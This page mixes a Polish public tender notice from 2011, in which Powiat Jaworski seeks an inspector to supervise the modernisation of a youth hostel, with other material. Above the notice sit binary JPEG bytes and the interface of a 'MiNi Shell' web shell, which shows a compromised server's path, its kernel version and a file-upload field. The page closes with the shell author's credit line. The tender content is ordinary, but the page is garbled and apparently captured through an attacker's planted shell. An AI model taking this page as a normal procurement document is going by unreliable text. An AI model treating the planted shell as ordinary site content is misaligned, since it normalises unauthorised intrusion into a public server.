JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20110401/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20110401/62594-N-2011.html

<p class="kh_header"><b>Jawor: Pełnienie funkcji inspektora nadzoru inwestorskiego nad realizacją inwestycji Rozwój turystyczny Powiatu Jaworskiego poprzez utworzenie schroniska młodzieżowego  -  przebudowa i modernizacja bazy noclegowej przy 
ul. Starojaworskiej 7</b><br>
<b>Numer ogłoszenia: 62594 - 2011; data zamieszczenia: 01.04.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiat Jaworski , ul. Wrocławska 26, 59-400 Jawor, woj. dolnośląskie, tel. 076 7290100, faks 076 7290160.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.powiat-jawor.org.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Pełnienie funkcji inspektora nadzoru inwestorskiego nad realizacją inwestycji Rozwój turystyczny Powiatu Jaworskiego poprzez utworzenie schroniska młodzieżowego  -  przebudowa i modernizacja bazy noclegowej przy 
ul. Starojaworskiej 7.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.	Przedmiotem zamówienia jest: Pełnienie funkcji inspektora nadzoru inwestorskiego nad realizacją inwestycji p.n. Rozwój turystyczny Powiatu Jaworskiego poprzez utworzenie schroniska młodzieżowego - przebudowa i modernizacja bazy noclegowej przy ul.Starojaworskiej 7.
Projekt współfinansowany jest ze środków Unii Europejskiej z Regionalnego Programu Operacyjnego Województwa Dolnośląskiego na lata 2007-2013.   
Zamówienie obejmuje Pełnienie nadzoru inwestorskiego nad wszelkimi robotami i pracami określonymi w dokumentacji projektowej dotyczącej przebudowy i modernizacji bazy noclegowej przy ul.Starojaworskiej 7 w Jaworze. 
W zakres modernizacji  wchodzi:
1)	Wymiana stolarki okiennej i drzwiowej;
2)	Wymiana instalacji elektrycznej oświetlenia i gniazd wtykowych na miedzianą wraz z oświetleniem awaryjnym;
3)	Wymiana instalacji wodno- kanalizacyjnej;
4)	 Wymiana instalacji C.O. na nową;
5)	 Wykonanie instalacji hydrantowej,
6)	Wykonanie przewodów spalinowych i wentylacyjnych,
7)	Wykonanie klimatyzacji w sali konferencyjnej, salach wykładowych i Sali konsumpcyjnej i kuchni,
8)	Wykonanie lekkich ścianek działowych i  łazienek w pokojach mieszkalnych;
9)	Wykonanie nowych okładzin posadzkowych;
10)	Wykonanie nowych okładzin ściennych ( przecierki gipsowe istniejących ścian);
11)	 Likwidacja barier architektonicznych ( zapewnienie dostępu osobom niepełnosprawnym do obiektu);
12)	Dobudowa zewnętrznego dźwigu osobowego przystosowanego do transportu osób niepełnosprawnych.
13)	Ocieplenie ścian zewnętrznych obiektu
14)	Ocieplenie konstrukcji dachu
15)	Wykonanie nowej kolorystyki elewacji
16)	Montaż instalacji solarnej
17)	Wykonanie kotłowni gazowej
18)	Wykonanie sygnalizacji przeciwpożarowej         
2.	Szczegółową charakterystykę, zakres oraz ilość robót podlegających nadzorowi określają: specyfikacje techniczne wykonania i odbioru robót budowlanych, dokumentacja projektowa oraz przedmiar robót, który nie stanowi opisu przedmiotu zamówienia i jest elementem pomocniczym. -  umieszczone na stronie  http://www.spjawor-bip.pbox.pl/public/print.php?id_menu_item=61559
3.	Obowiązki inspektora nadzoru są następujące:
1)	pełnienie funkcji inspektora nadzoru inwestorskiego zgodnie z przepisami prawa, 
2)	reprezentowanie inwestora na budowie przez sprawowanie kontroli zgodności jej realizacji z projektem budowlanym, zasadami wiedzy technicznej, przepisami oraz pozwoleniem na budowę,
3)	sprawdzanie jakości wykonywanych robót i wbudowanych wyrobów budowlanych, 
4)	odbieranie robót budowlanych ulegających zakryciu i zanikających,
5)	przygotowanie i uczestniczenie w czynnościach odbioru obiektu budowlanego,
6)	przekazanie gotowego obiektu budowlanego do użytkowania ,
7)	potwierdzanie faktycznie wykonanych robót oraz usunięcia wad,
8)	na żądanie Zamawiającego kontrola rozliczeń budowy,
9)	w przypadku, gdyby postęp robót budowlanych nie był zadawalający z przyczyn niezależnych od Wykonawcy robót, do obowiązków Wykonawcy usługi będzie należało poinformowanie Zamawiającego za pośrednictwem wyznaczonego przedstawiciela o wszystkich środkach, które należy podjąć w celu zaradzenia zaistniałej sytuacji oraz wypełnienia zobowiązań wynikających z umowy o roboty budowlane.
4.	  Szczegóły dotyczące pełnienia obowiązków inspektora nadzoru :
1)	Etap poprzedzający budowę. 
a) Zamawiający przekaże Wykonawcy, na czas pełnienia nadzoru, kopie następujących dokumentów: umowę o roboty budowlane, ofertę Wykonawcy Robót , dokumentację projektową wraz ze Specyfikacjami technicznymi, decyzje administracyjne pozwalające na realizację umowy na roboty budowlane,
b) przed planowanym terminem rozpoczęcia robót Wykonawca zapozna się z dokumentacją Zamawiającego, o której mowa w ppkt. a w celu jej sprawdzenia.  
2) Etap budowy, tj. od dnia podpisania umowy z Wykonawcą robót do dnia odbioru  końcowego i przekazania do eksploatacji,
* Wykonawca usługi na prowadzenie nadzoru inwestorskiego jest upoważniony i zobowiązany do:
-	reprezentowania Zamawiającego w kontaktach z osobami trzecimi w sprawach związanych z prowadzeniem robót;  
-	uczestniczenia w przekazaniu Wykonawcy Robót terenu budowy, polecenia rozpoczęcia robót; 
-	prowadzenia regularnych inspekcji (potwierdzonych wpisem do dziennika budowy) na terenie budowy w celu sprawdzenia jakości wykonywanych robót oraz wbudowywanych materiałów, zgodnie z wymaganiami specyfikacji technicznych, dokumentacji projektowej oraz przepisami prawa,
-	 kontrolowania przestrzegania przez Wykonawcę Robót zasad bezpieczeństwa pracy 
i utrzymania porządku na terenie budowy;
-	udzielania Wykonawcy Robót wszelkich dostępnych informacji i wyjaśnień dotyczących Kontraktu;
-	monitorowania postępu robót poprzez sprawdzanie ich rzeczywistego zaawansowania i zgodności realizacji z obowiązującym harmonogramem robót;
-	kontroli sposobu składowania i przechowywania materiałów;
-	nadzorowania badań materiałów i robót  wykonywanych przez Wykonawcę Robót;
-	zlecania Wykonawcy Robót wykonania dodatkowych badań materiałów lub robót budzących wątpliwość co do ich jakości;
-	weryfikowania rysunków powykonawczych sporządzanych przez Wykonawcę Robót;
-	odbioru robót zanikających i ulegających zakryciu;
-	sprawdzenia wykonanych robót i powiadomienie Wykonawcy Robót o wykrytych wadach oraz określenia zakresu koniecznych do wykonania robót poprawkowych;
-	poświadczenia usunięcia przez Wykonawcę Robót wad;
-	przygotowania do odbioru częściowego i końcowego robót, sprawdzenia kompletności                                     i prawidłowości przedłożonych przez Wykonawcę Robót dokumentów wymaganych do odbioru oraz uczestnictwo w odbiorze robót;
-	przygotowania i sprawdzenia kompletności i prawidłowości przedłożonych przez Wykonawcę Robót dokumentów wymaganych do wniosku o pozwolenie na użytkowanie oraz uczestnictwo w kontroli robót przeprowadzonej przez organy  nadzoru budowlanego; 
-	poświadczenia terminu zakończenia robót;
-	dostarczenia Zamawiającemu wszelkich raportów, akt, certyfikatów przygotowanych przez Wykonawcę Robót po zakończeniu robót;
-	zapobiegania roszczeniom Wykonawcy Robót;
-	rozliczenia umowy o roboty budowlane w przypadku jej wypowiedzenia;
-	wydania polecenia przyspieszenia lub opóźnienia tempa robót;
-	wystawiania i przygotowania wszelkich niezbędnych dokumentów wymaganych przez Zamawiającego  lub Instytucji Zarządzającej i Pośredniczącej RPO;
-	udziału w przygotowaniu raportów i sprawozdań wymaganych przez Zamawiającego i procedury wdrażania projektu RPO,
-	udział w rozwiązywaniu wszelkiego rodzaju skarg i roszczeń osób trzecich wywołanych realizacją Kontraktu,
-	do udzielenia odpowiedzi na pisemne zapytania Wykonawcy robót w terminie 3 dni
              * Wykonawca usługi na prowadzenie nadzoru inwestorskiego będzie decydować o :
-	dopuszczeniu materiałów, prefabrykatów i wszystkich elementów i urządzeń przewidzianych do wbudowania i wykorzystania przy realizacji robót;
-	zatwierdzeniu receptur i technologii proponowanych przez Wykonawcę Robót; 
-	wstrzymaniu robót prowadzonych w sposób zagrażający bezpieczeństwu lub niezgodnie z przepisami prawa. 
           3.  Etap po zakończeniu robót
W okresie zgłaszania wad i bezpośrednio po nim oraz w okresie gwarancyjnym, do zadań  Wykonawcy usługi na prowadzenie nadzoru inwestorskiego będzie należało:
-	reprezentowanie zamawiającego w kontaktach z osobami trzecimi w sprawach związanych z przeglądami wykonanych robót oraz usuwaniem wad, które ujawnią się w okresie rękojmi,
-	prowadzenie  przeglądów wykonanych robót , co najmniej 1 raz w roku) z udziałem przedstawicieli Zamawiającego i Wykonawcy Robót, sporządzenie protokołów z przeglądów, 
-	finalizacja zadań wynikających z obowiązków na etapie budowy;
-	dokonywanie inspekcji i nadzór nad robotami  niezbędnymi do usunięcia wad;
-	odbiór wykonanych robót związanych z usunięciem wad;
-	wspieranie Zamawiającego w negocjacjach dotyczących nierozstrzygniętych roszczeń i sporów;
-	sprawdzenie i potwierdzenie gotowości obiektu do dokonania przez Zamawiającego komisyjnego odbioru pogwarancyjnego (ostatecznego), wraz z przygotowaniem wszelkich niezbędnych dokumentów oraz sporządzenie protokołu ostatecznego. 
   5. Współpraca z Zamawiającym:
Na każdym etapie realizacji robót Wykonawca usługi zapewni Zamawiającemu wszelką niezbędną pomoc w prowadzeniu inwestycji. Wykonawca usługi nie może zwolnić którejkolwiek ze stron z jakichkolwiek obowiązków, zobowiązań lub odpowiedzialności wynikających z umowy o roboty budowlane..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 71.24.70.00-1.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2011.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie przewiduje wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek zostanie spełniony jeżeli Wykonawca wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert   w   postępowaniu, a jeżeli okres prowadzenia  działalności  jest  krótszy - w tym okresie  wykonał  co najmniej:  1  usługę polegającą na wykonywaniu pełnego nadzoru inwestorskiego przy budowie, rozbudowie,  przebudowie lub  remoncie obiektu kubaturowego użyteczności publicznej  o porównywalnym zakresie prac i kubaturze min. 20 000 m3. Pełny zakres nadzoru inwestorskiego to nadzór nad robotami konstrukcyjno-budowlanymi i min. instalacjami sanitarnymi i elektrycznymi.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>warunek ten zostanie spełniony jeżeli Wykonawca wykaże, że dysponuje:
a)	 co najmniej 1 osobą przewidzianą na stanowisko inspektora nadzoru  posiadającą uprawnienia budowlane bez ograniczeń w specjalności konstrukcyjno-budowlanej w rozumieniu rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 roku w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. nr 83, poz. 578 z późn. zm.), potwierdzone stosownymi decyzjami, o których mowa w ustawie z dnia 07 lipca 1994 roku Prawo budowlane (Dz. U. z 2006 r. nr 156, poz. 1118 z poźn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa,
b)	co najmniej 1 osobą przewidzianą na stanowisko inspektora nadzoru w branży sanitarnej  posiadającą uprawnienia budowlane odpowiadające przedmiotowi niniejszego zamówienia w specjalności instalacyjnej w zakresie sieci, instalacji  i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych w rozumieniu rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 roku w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. nr 83, poz. 578 z późn. zm.), potwierdzone stosownymi decyzjami, o których mowa w ustawie z dnia 07 lipca 1994 roku Prawo budowlane (Dz. U. z 2006 r. nr 156, poz. 1118 z poźn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących
c)	co najmniej 1 osobą przewidzianą na stanowisko inspektora nadzoru w branży elektrycznej posiadającą uprawnienia budowlane odpowiadające przedmiotowi niniejszego zamówienia w specjalności instalacyjnej w zakresie sieci, instalacji  i urządzeń elektrycznych i elektroenergetycznych w rozumieniu rozporządzenia Ministra Transportu i Budownictwa z dnia 28 kwietnia 2006 roku w sprawie samodzielnych funkcji technicznych w budownictwie (Dz. U. z 2006 r. nr 83, poz. 578 z późn. zm.), potwierdzone stosownymi decyzjami, o których mowa w ustawie z dnia 07 lipca 1994 roku Prawo budowlane (Dz. U. z 2006 r. nr 156, poz. 1118 z poźn. zm.) lub odpowiadające im ważne uprawnienia budowlane, które zostały wydane na podstawie wcześniej obowiązujących przepisów prawa.
Dopuszcza się łączenie kilku funkcji przez jedna osobę w przypadku posiadania przez ta osobę kilku rodzajów uprawnień lub kwalifikacji.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

<li  style="margin-bottom: 12px;">oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)	Wypełniony formularz ofertowy - z wykorzystaniem wzoru stanowiącego załącznik Nr 1 do niniejszej SIWZ.
2)	Pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia - jeżeli dotyczy.  
3)	Pełnomocnictwo do reprezentowania Wykonawcy  - o ile ofertę składa pełnomocnik 
4)	Oświadczenie Wykonawcy o spełnianiu warunków w zakresie art. 22 ust. 1 ustawy.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zmiany do treści niniejszej umowy będą dopuszczalne jedynie w przypadku i zakresie: 
1)	zmiany ogólne: 
a) zmiana siedziby, adresu Zamawiającego oraz Wykonawcy,
b) zmiana osób występujących po stronie Zamawiającego oraz Wykonawcy, z zastrzeżeniem, że zmiana osób przy pomocy których Wykonawca realizuje przedmiot umowy na inne legitymujące się co najmniej równoważnymi uprawnieniami, o których mowa w ustawie Prawo budowlane.  
                                     2) zmiany wpływające na termin wykonania umowy:
a) możliwe jest przedłużenie terminu zakończenia umowy o czas opóźnienia, jeżeli opóźnienie to wynika z przyczyn leżących po stronie Zamawiającego i jeżeli takie opóźnienie jest lub będzie miało wpływ na wykonanie przedmiotu umowy, w zakresie następujących obowiązków Zamawiającego: przekazanie terenu budowy, przekazanie dokumentów budowy,
b) zmiana terminu realizacji przedmiotu zamówienia, w przypadku zmiany terminu realizacji inwestycji,
3)	  zmiany wpływające na wysokość wynagrodzenia:
a)	wynikające ze zmiany stawki podatku od towarów i usług (VAT) w przypadku zmiany obowiązujących, w tym zakresie przepisów,
b)	zmniejszenie wynikające z wystąpienia okoliczności o których mowa w § 5 ust. 9 na zasadach określonych w § 5 ust. 10 niniejszej umowy.   
4.	Strona występująca o zmianę postanowień zawartej umowy zobowiązana jest do udokumentowania zaistnienia powyższych okoliczności.
5.	Wniosek o zmianę postanowień zawartej umowy musi być wyrażony na piśmie</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.spjawor-bip.pbox.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Starostwo Powiatowe w Jaworze, ul. Wrocławska 26, 59- 400 Jawor. Koszt siwz w wersji papierowej 15 zł.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.04.2011 godzina 10:00, miejsce: Starostwo Powiatowe w Jaworze, ul. Wrocławska 26, 59- 400 Jawor, pokój Nr 108 I piętro (Kancelaria ogólna).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt jest współfinansowany przez Unię Europejską z Europejskiego Funduszu Rozwoju Regionalnego w ramach Regionalnego Programu Operacyjnego dla Województwa Dolnośląskiego na lata 2007 - 2013...</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com